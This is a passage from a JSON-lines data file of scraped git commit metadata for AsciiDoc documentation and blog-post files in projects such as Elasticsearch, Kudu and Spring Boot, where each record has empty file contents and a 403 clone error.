error.\n","repos":"rajanm\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,jimczi\/elasticsearch,s1monw\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,mjason3\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,nezirus\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,fred84\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,markwalkom\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,kalimatas\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch","old_file":"docs\/reference\/index-modules\/index-sorting.asciidoc","new_file":"docs\/reference\/index-modules\/index-sorting.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81ce7c93791ad539889f15e7be075508b528a31d","subject":"y2b create post Google Pixel XL Unboxing - The New Android King?","message":"y2b create post Google Pixel XL Unboxing - The New Android King?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-20-Google-Pixel-XL-Unboxing--The-New-Android-King.adoc","new_file":"_posts\/2016-10-20-Google-Pixel-XL-Unboxing--The-New-Android-King.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ba2ee0eb47336d6c7c53e89ac520fbed8c5b86f","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/12\/10\/deref.adoc","new_file":"content\/news\/2021\/12\/10\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"dda74081f91b1086c85b4b9a2aaa9fc392c62c9c","subject":"Cleanup from-source installation instructions","message":"Cleanup from-source installation instructions\n\nWe were previously recommending setting both CMAKE_INSTALL_PREFIX and DESTDIR to\n\/opt\/kudu, which would result in artifacts being installed into\n\/opt\/kudu\/opt\/kudu. Additionally, we listed the installation step as optional,\nbut included it in the overall build script which skips optional steps.\n\nChange-Id: Ib8d7d5e564d5b03a6f3bd092d8e1f2ad1aa17405\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1872\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e17f9d142d318e537136cc229657b6cc4b7863e8","subject":"Add missing article","message":"Add missing article\n","repos":"stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org","old_file":"news\/2017-08-25-WildFly11-CR1-Released.adoc","new_file":"news\/2017-08-25-WildFly11-CR1-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8a12ec5637c3f0830adac49acbf45233be35590","subject":"Variable RELEASEs","message":"Variable RELEASEs\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8705f104ea2f253279238105d53ab145a41e6b7e","subject":"y2b create post Ultimate Gaming PC Update (UGPC 2012)","message":"y2b create post Ultimate Gaming PC Update (UGPC 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-08-20-Ultimate-Gaming-PC-Update-UGPC-2012.adoc","new_file":"_posts\/2012-08-20-Ultimate-Gaming-PC-Update-UGPC-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d3a1d2a0dd2c5ee39611e5e47c7d6fcabcd528a","subject":"Adding short description for experimental status in docs","message":"Adding short description for experimental status in docs\n","repos":"GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch","old_file":"docs\/reference\/search\/rank-eval.asciidoc","new_file":"docs\/reference\/search\/rank-eval.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0166d3532159ab09eeb556cf10b1611138616a44","subject":"Fixed typing in JSF documentation","message":"Fixed typing in JSF documentation","repos":"subaochen\/deltaspike,rdicroce\/deltaspike,Danny02\/deltaspike,rdicroce\/deltaspike,mlachat\/deltaspike,os890\/DS_Discuss,Danny02\/deltaspike,struberg\/deltaspike,struberg\/deltaspike,subaochen\/deltaspike,idontgotit\/deltaspike,danielsoro\/deltaspike,danielsoro\/deltaspike,mlachat\/deltaspike,apache\/deltaspike,os890\/deltaspike-vote,apache\/deltaspike,apache\/deltaspike,os890\/DS_Discuss,os890\/deltaspike-vote,os890\/deltaspike-vote,danielsoro\/deltaspike,danielsoro\/deltaspike,rdicroce\/deltaspike,os890\/deltaspike-vote,Danny02\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,idontgotit\/deltaspike,idontgotit\/deltaspike,apache\/deltaspike,struberg\/deltaspike,os890\/DS_Discuss,rdicroce\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,Danny02\/deltaspike,struberg\/deltaspike,subaochen\/deltaspike,os890\/DS_Discuss","old_file":"documentation\/src\/main\/asciidoc\/jsf.adoc","new_file":"documentation\/src\/main\/asciidoc\/jsf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"911ac4c76ad705232845c5e49df0696fc5ab3436","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2839fdcb2a2de65808217ddbc5fea37eebe6d3fd","subject":"Update 06_Frequently_asked_Questions.adoc","message":"Update 06_Frequently_asked_Questions.adoc","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual\/06_Frequently_asked_Questions.adoc","new_file":"src\/docs\/manual\/06_Frequently_asked_Questions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c09b69ca13a728f041df247b2dbcf1a6ef083bcd","subject":"Update 2015-03-05-Test-2.adoc","message":"Update 2015-03-05-Test-2.adoc","repos":"fbridault\/sandblog,fbridault\/sandblog,fbridault\/sandblog","old_file":"_posts\/2015-03-05-Test-2.adoc","new_file":"_posts\/2015-03-05-Test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbridault\/sandblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"804b472f6cc5d91eb6da097d8cbfb70eb6b2cc8c","subject":"Update 2015-12-23-Python-Method-Resolution-Order.adoc","message":"Update 2015-12-23-Python-Method-Resolution-Order.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-23-Python-Method-Resolution-Order.adoc","new_file":"_posts\/2015-12-23-Python-Method-Resolution-Order.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b620deab2d055c71b8e00e8a1af491f7b4963a5","subject":"y2b create post Is It A Phone, A Laptop, Or A PC?","message":"y2b create post Is It A Phone, A Laptop, Or A PC?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-20-Is-It-A-Phone-A-Laptop-Or-A-PC.adoc","new_file":"_posts\/2017-02-20-Is-It-A-Phone-A-Laptop-Or-A-PC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fc7a38de589e731796e21e65d79bd875f534e18","subject":"Update 2015-02-21-Den-anoigei-o-ypologisths-44-Bhmata-gia-Diagnwsh.adoc","message":"Update 2015-02-21-Den-anoigei-o-ypologisths-44-Bhmata-gia-Diagnwsh.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-21-Den-anoigei-o-ypologisths-44-Bhmata-gia-Diagnwsh.adoc","new_file":"_posts\/2015-02-21-Den-anoigei-o-ypologisths-44-Bhmata-gia-Diagnwsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6174b7a910aaa610fd696c24a4b9375590f001d","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68282a12659a0bec3ec32d86168cff5ef711cca9","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e005e17f1ed79bd70f76708e6698cd5290e03b6a","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"hibernate\/hibernate-criteria\/readme.adoc","new_file":"hibernate\/hibernate-criteria\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84e78159e24f17d81a669f6b9ea256ea15a9d801","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8a59bf481497eb72b02c33324e8dd9ee2dff91b","subject":"Renamed '_posts\/2019-01-31-Your-Blog-Is-Your-Home.adoc' to '_posts\/2018-01-09-Your-Blog-Is-Your-Home.adoc'","message":"Renamed '_posts\/2019-01-31-Your-Blog-Is-Your-Home.adoc' to '_posts\/2018-01-09-Your-Blog-Is-Your-Home.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Your-Blog-Is-Your-Home.adoc","new_file":"_posts\/2018-01-09-Your-Blog-Is-Your-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556852036bd641589e40fc28bde278cd3f0c11c9","subject":"Starting to work on hp-ux notes doc","message":"Starting to work on hp-ux notes doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/hpux_notes.adoc","new_file":"doc\/hpux_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"a577fb3381c8c9229502677e8d403f5fdd7c0704","subject":"[DOCS] Fix formatting error in Slack action","message":"[DOCS] Fix formatting error in Slack action\n","repos":"GlenRSmith\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch","old_file":"x-pack\/docs\/en\/watcher\/actions\/slack.asciidoc","new_file":"x-pack\/docs\/en\/watcher\/actions\/slack.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"986275c73d5a3c6c8c7990dc42d6e9f1c0f3f196","subject":"Order configuration properties group in Appendix","message":"Order configuration properties group in Appendix\n\nCreate a set of core groups to gather properties logically: core, web,\nsecurity, data, integration, actuator and devtools.\n\nIn each of them, groups are ordered against their lexical order.\n\nCloses gh-4344\n","repos":"philwebb\/spring-boot-concourse,herau\/spring-boot,Nowheresly\/spring-boot,kamilszymanski\/spring-boot,ptahchiev\/spring-boot,neo4j-contrib\/spring-boot,ptahchiev\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,mbogoevici\/spring-boot,hqrt\/jenkins2-course-spring-boot,htynkn\/spring-boot,olivergierke\/spring-boot,jayarampradhan\/spring-boot,afroje-reshma\/spring-boot-sample,joshiste\/spring-boot,deki\/spring-boot,izeye\/spring-boot,brettwooldridge\/spring-boot,SaravananParthasarathy\/SPSDemo,lucassaldanha\/spring-boot,jmnarloch\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,shangyi0102\/spring-boot,Buzzardo\/spring-boot,habuma\/spring-boot,qerub\/spring-boot,bclozel\/spring-boot,jayarampradhan\/spring-boot,deki\/spring-boot,habuma\/spring-boot,zhangshuangquan\/spring-root,mevasaroj\/jenkins2-course-spring-boot,javyzheng\/spring-boot,eddumelendez\/spring-boot,hello2009chen\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,felipeg48\/spring-boot,bijukunjummen\/spring-boot,mbogoevici\/spring-boot,joshthornhill\/spring-boot,neo4j-contrib\/spring-boot,DeezCashews\/spring-boot,sbuettner\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,kdvolder\/spring-boot,dfa1\/spring-boot,lburgazzoli\/spring-boot,dfa1\/spring-boot,htynkn\/spring-boot,sbcoba\/spring-boot,akmaharshi\/jenkins,drumonii\/spring-boot,neo4j-contrib\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,jayarampradhan\/spring-boot,spring-projects\/spring-boot,ameraljovic\/spring-boot,joshiste\/spring-boot,lenicliu\/spring-boot,jbovet\/spring-boot,sbuettner\/spring-boot,ihoneymon\/spring-boot,DeezCashews\/spring-boot,linead\/spring-boot,michael-simons\/spring-boot,lexandro\/spring-boot,minmay\/spring-boot,jxblum\/spring-boot,izeye\/spring-boot,ollie314\/spring-boot,habuma\/spring-boot,joansmith\/spring-boot,joshiste\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot-concourse,yhj630520\/spring-boot,candrews\/spring-boot,vpavic\/spring-boot,ilayaperumalg\/spring-boot,felipeg48\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,kamilszymanski\/spring-boot,bclozel\/spring-boot,linead\/spring-boot,vpavic\/spring-boot,neo4j-contrib\/spring-boot,pvorb\/spring-boot,RichardCSantana\/spring-boot,minmay\/spring-boot,deki\/spring-boot,RichardCSantana\/spring-boot,mosoft521\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,jvz\/spring-boot,shakuzen\/spring-boot,tiarebalbi\/spring-boot,herau\/spring-boot,philwebb\/spring-boot,spring-projects\/spring-boot,ihoneymon\/spring-boot,zhanhb\/spring-boot,nebhale\/spring-boot,xiaoleiPENG\/my-project,shakuzen\/spring-boot,izeye\/spring-boot,jbovet\/spring-boot,nebhale\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,yhj630520\/spring-boot,tsachev\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,isopov\/spring-boot,shangyi0102\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,hello2009chen\/spring-boot,nebhale\/spring-boot,joshiste\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bclozel\/spring-boot,lucassaldanha\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,bjornlindstrom\/spring-boot,joshthornhill\/spring-boot,htynkn\/spring-boot,thomasdarimont\/spring-boot,chrylis\/spring-boot,lenicliu\/spring-boot,vpavic\/spring-boot,mbogoevici\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,sebastiankirsch\/spring-boot,dfa1\/spring-boot,donhuvy\/spring-boot,dfa1\/spring-boot,qerub\/spring-boot,xiaoleiPENG\/my-project,bbrouwer\/spring-boot,isopov\/spring-boot,pvorb\/spring-boot,minmay\/spring-boot,drumonii\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shakuzen\/spring-boot,wilkinsona\/spring-boot,ameraljovic\/spring-boot,akmaharshi\/jenkins,joshiste\/spring-boot,linead\/spring-boot,donhuvy\/spring-b